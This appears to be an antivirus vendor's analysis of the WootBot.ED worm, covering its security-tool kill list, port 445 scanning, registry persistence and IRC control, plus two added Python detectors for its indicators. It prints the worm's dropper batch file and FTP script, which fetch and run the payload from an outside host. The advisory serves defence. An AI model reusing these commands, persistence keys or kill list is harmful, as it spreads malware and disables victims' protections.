W32/WootBot.ED!worm
Analysis
This virus is a 32-bit executable with a packed file size of 86,466 bytes. It contains code to spread to other systems using known RPC exploits and to connect to an IRC server to await instructions from a malicious user. It can also terminate utility programs and other important services.
Service Termination Routine
When the virus activates, it uses PSAPI.DLL to identify and terminate applications or services based on a master list stored in the virus. The list also includes the names of other known threats -
Common threat filenames
video.exe
norton123.exe
svchosting.exe
0x1fe.exe
inst.EXE
explore32.exe
winagent.exe
lssas.exe
lsass2.exe
rxb1ot.exe
serasa.exe
serasa.exe.a
novarg_upx.zip
photo.zip
opr0371I.js
change.exe
pic33.scr
winset32.exe
wuarclt.exe
Crypto3.jpg
Tcpview1.exe
Tcpview.exe
taskmgr1.exe
taskmg.exe
cmd2.exe
cmd1.exe
ad-watch.exe
expore.exe
CSSSS.exe
CSRSR.exe
CSRSRS.exe
smsss.exe
sub7.exe
jpg.exe
bot.exe
fbi.exe
wupdate.exe
phatbot.exe
agobot.exe
iexplorer.exe
windowsupdate.exe
gov.exe
bircd.exe
rbot.exe
spybot.exe
rxbot.exe
forbot.exe
i11r54n4.exe
irun4.exe
d3dupdate.exe
rate.exe
ssate.exe
winsys.exe
winupd.exe
SysMonXP.exe
bbeagle.exe
Penis32.exe
mscvb32.exe
sysinfo.exe
Utility applications or services
PandaAVEngine.exe
F-AGOBOT.EXE
HIJACKTHIS.EXE
wircd.exe
cmd.exe
regedit.exe
msconfig.exe
taskmgr.exe
zapro.EXE
vsmon.EXE
vshwin32.EXE
vbcmserv.EXE
sbserv.EXE
rtvscan.EXE
rapapp.EXE
pcscan.EXE
pccwin97.EXE
pccntmon.EXE
pavproxy.EXE
nvsvc32.EXE
ntrtscan.EXE
npscheck.EXE
notstart.EXE
lockdown2000.EXE
iamserv.EXE
iamapp.EXE
gbpoll.EXE
gbmenu.EXE
fsmb32.EXE
fsma32.EXE
fsm32.EXE
fsgk32.EXE
fsav32.EXE
fsaa.EXE
fnrb32.EXE
fih32.EXE
fch32.EXE
fameh32.EXE
f-stopw.EXE
defscangui.EXE
defalert.EXE
cpd.EXE
cleaner3.EXE
cleaner.EXE
ccPxySvc.EXE
ccEvtMgr.EXE
ccApp.EXE
blackd.EXE
avpm.EXE
avkwctl9.EXE
avkservice.EXE
avkpop.EXE
apvxdwin.EXE
agentw.EXE
ZONALM2601.EXE
CZAUINST.EXE
ZATUTOR.EXE
ZAPSETUP3001.EXE
ZAPRO.EXE
XPF202EN.EXE
WrCtrl.EXE
WrAdmin.EXE
_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
ZONEALARM.EXE
Internet Connection Attempts
The virus then begins scanning random IP addresses on TCP port 445 to identify potential targets. It sends a SYN packet to randomly selected IP addresses in the subnet the system is on (the first two octets are kept and the last two are randomized). For instance, if the infected system's IP address is 10.10.18.185, the virus targets systems on 10.10.[random].[random], such as these examples -
10.10.1.240
10.10.25.13
10.10.69.53
10.10.17.119
and so on. If a system responds with an acknowledgement [ACK], it becomes a target for the virus. The virus then tries to gain access using an RPC DCOM exploit. If access is gained, it creates a batch script file named "c.bat" with these instructions -
@echo off
ftp -n -v -s:.pif
woopie.exe
del .pif
del /F c.bat
exit /y
The instructions above do the following -
- start an instance of the FTP [file transfer protocol] program
- suppress displaying server responses, and prevent auto login when connecting
- use a script file named ".pif" to handle logon info
- run the file "woopie.exe"
- delete the ftp script file ".pif", and forcibly delete the current batch script "c.bat"
- exit the command shell
The ftp script file ".pif" contains these instructions -
open dra.chatcenter.nl
21
user ******* ******
binary
GET woopie.exe
bye
In the above script, the user name and password have been edited out for obvious reasons. The file "woopie.exe" is a copy of the virus. FortiGate would block the transfer if antivirus scanning of the FTP service is enabled.
Loading at Windows startup
If the virus is run, it copies itself to the System32 folder on the hard drive as "Nvsc32.exe" and modifies the registry in numerous places to maximize the chance of the virus loading at each user logon -
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Runonce
"NvCplScan" = nvsc32.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
"NvCplScan" = nvsc32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
"NvCplScan" = nvsc32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
"NvCplScan" = nvsc32.exe
Additionally, the virus creates a service on Windows NT/2000/XP systems and makes these registry changes -
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\
"NextInstance" = 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\0000\
"Class" = LegacyDriver
"ClassGUID" = {8ECC055D-047F-11D1-A537-0000F8753ED1}
"ConfigFlags" = 00, 00, 00, 00
"DeviceDesc" = NvCplScan
"Legacy" = 01, 00, 00, 00
"Service" = NvCplScan
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\0000\Control\
"*NewlyCreated*" = 00, 00, 00, 00
"ActiveService" = NvCplScan
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\
"DeleteFlag" = 01, 00, 00, 00
"DisplayName" = NvCplScan
"ErrorControl" = 01, 00, 00, 00
"FailureActions" = (hex values)
"ImagePath" = "C:\WINNT\System32\nvsc32.exe" -netsvcs
"ObjectName" = LocalSystem
"Start" = 04, 00, 00, 00
"Type" = 20, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\Enum\
"0" = Root\LEGACY_NVCPLSCAN\0000
"Count" = 01, 00, 00, 00
"NextInstance" = 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\Security\
"Security" = (hex values)
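The autorun values and the NvCplScan service/enum keys listed above are the persistence footprint an incident responder would look for. The following is an added example, not Fortinet's code, that parses a Windows registry export (.reg text) and flags entries matching those indicators; the SAMPLE_REG export and the .reg-parsing helpers are constructed for this demo.

```python
"""Flag the WootBot.ED persistence indicators listed above in a Windows
registry export (.reg text).  Added example, not Fortinet's code; the
sample export below is constructed for the demo."""
import re

# Indicator strings taken from the advisory above
AUTORUN_VALUE = "NvCplScan"
AUTORUN_FILE = "nvsc32.exe"
AUTORUN_KEYS = (r"\CurrentVersion\Run",
                r"\CurrentVersion\RunOnce",
                r"\CurrentVersion\RunServices")
SERVICE_KEY = r"\CurrentControlSet\Services\NvCplScan"
LEGACY_KEY = r"\Enum\Root\LEGACY_NVCPLSCAN"

KEY_RE = re.compile(r"^\[(.+)\]$")           # [HKEY_...\path]
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')    # "Name"=data

# Constructed .reg export: two autorun entries, the service key, the
# legacy enum key, and one benign autorun value that must not be flagged.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NvCplScan"="nvsc32.exe"
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"NvCplScan"="nvsc32.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan]
"DisplayName"="NvCplScan"
"ImagePath"="C:\\WINNT\\System32\\nvsc32.exe -netsvcs"
"ObjectName"="LocalSystem"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\0000]
"Service"="NvCplScan"
"""


def parse_reg(text):
    """Yield (key, value_name, data) for every value in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m.group(1), m.group(2).strip('"')


def find_indicators(reg_text):
    """Return (category, key, value_name, data) for each indicator hit.

    'autorun'  - a Run/RunOnce/RunServices value named NvCplScan or
                 pointing at nvsc32.exe (case-insensitive).
    'service'  - the NvCplScan service key or its LEGACY_NVCPLSCAN enum
                 entry; reported once per key.
    """
    findings = []
    flagged_keys = set()
    for key, name, data in parse_reg(reg_text):
        ukey = key.upper()
        if any(ukey.endswith(k.upper()) for k in AUTORUN_KEYS):
            if name.upper() == AUTORUN_VALUE.upper() or AUTORUN_FILE in data.lower():
                findings.append(("autorun", key, name, data))
        elif (SERVICE_KEY.upper() in ukey or LEGACY_KEY.upper() in ukey) \
                and key not in flagged_keys:
            flagged_keys.add(key)
            findings.append(("service", key, name, data))
    return findings


if __name__ == "__main__":
    for category, key, name, data in find_indicators(SAMPLE_REG):
        print(f"{category:8} {key}  {name} = {data}")
```

The matching is case-insensitive because the advisory itself lists the same value under both "Runonce" and "RunOnce"; a real export is produced with "reg export HKLM\SOFTWARE out.reg" (and the HKCU/HKU hives) and passed to find_indicators.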
IRC Server Connection
The virus may bind to a TCP port and then attempts to connect to the IRC server 'members.home.nl'. Once connected, it awaits instructions from a malicious user.
Those commands can instruct it to send floods (PING, HTTP, UDP, SYN), scan for exploitable hosts (DCOM, NetBIOS) and perform other actions. The virus can also function as an FTP or HTTP server, acting as a file server or staging server.
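Both network behaviours described in this advisory, the TCP/445 SYN sweep of the local subnet under Internet Connection Attempts and the outbound IRC connection above, are visible in perimeter logs. The following is an added example, not Fortinet's code, that runs a simple detector over firewall-style log lines; the log format, the SAMPLE_LOG lines and the SCAN_THRESHOLD value are constructed assumptions for this demo.

```python
"""Detect the two network behaviours of WootBot.ED described above:
(1) a host sending SYNs to TCP/445 across many hosts in its own /16, and
(2) an outbound connection to an IRC port.  Added example, not Fortinet's
code; the log format and sample lines are constructed for this demo."""
from collections import defaultdict
import ipaddress

# Constructed log lines: "<time> <src_ip> <dst_ip> <dst_port> <tcp_flags>"
# 10.10.18.185 mirrors the infected host in the advisory; 10.10.18.200 is
# a benign host with normal traffic.
SAMPLE_LOG = """\
10:00:01 10.10.18.185 10.10.1.240 445 S
10:00:01 10.10.18.185 10.10.25.13 445 S
10:00:01 10.10.18.185 10.10.69.53 445 S
10:00:02 10.10.18.185 10.10.17.119 445 S
10:00:02 10.10.18.185 10.10.200.7 445 S
10:00:02 10.10.18.185 10.10.3.44 445 S
10:00:03 10.10.18.185 10.10.88.1 445 S
10:00:03 10.10.18.185 10.10.5.250 445 S
10:00:04 10.10.18.185 10.10.9.9 445 S
10:00:04 10.10.18.185 10.10.77.77 445 S
10:00:09 10.10.18.185 203.0.113.5 6667 S
10:00:10 10.10.18.200 10.10.18.1 445 S
10:00:11 10.10.18.200 93.184.216.34 443 S
"""

SCAN_THRESHOLD = 8      # distinct 445 targets in the local /16 (assumed)
IRC_PORTS = {6667}      # port named in the Recommended Action section


def parse_log(text):
    """Yield (time, src, dst, port, flags); malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, port, flags = parts
        yield ts, ipaddress.ip_address(src), ipaddress.ip_address(dst), int(port), flags


def detect(text, scan_threshold=SCAN_THRESHOLD):
    """Return hosts sweeping TCP/445 in their own /16 and any IRC connections."""
    smb_targets = defaultdict(set)   # src -> distinct 445 targets
    irc_conns = []
    for ts, src, dst, port, flags in parse_log(text):
        if "S" not in flags or "A" in flags:   # count only initial SYNs
            continue
        # The advisory says targets keep the first two octets of the
        # infected host's address, i.e. they lie in the same /16.
        local16 = ipaddress.ip_network(f"{src}/16", strict=False)
        if port == 445 and dst in local16:
            smb_targets[src].add(dst)
        elif port in IRC_PORTS:
            irc_conns.append((str(src), str(dst), port))
    scanners = sorted(str(s) for s, t in smb_targets.items() if len(t) >= scan_threshold)
    return {"smb_scanners": scanners, "irc_connections": irc_conns}


if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

The threshold is deliberately per-source rather than per-packet: a single host legitimately opening one or two SMB sessions never trips it, while a sweep across dozens of random addresses in the /16 does, regardless of whether any target answered.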
Miscellaneous
The virus contains the string 'Woot' in its body.
Recommended Action
- Block Internal to External (INT -> EXT) and External to Internal (EXT -> INT) traffic on TCP ports 135, 139, 445, and 6667
- Ensure the latest Microsoft security patches are applied to all systems, particularly those addressing the RPC vulnerabilities and other vulnerabilities associated with this virus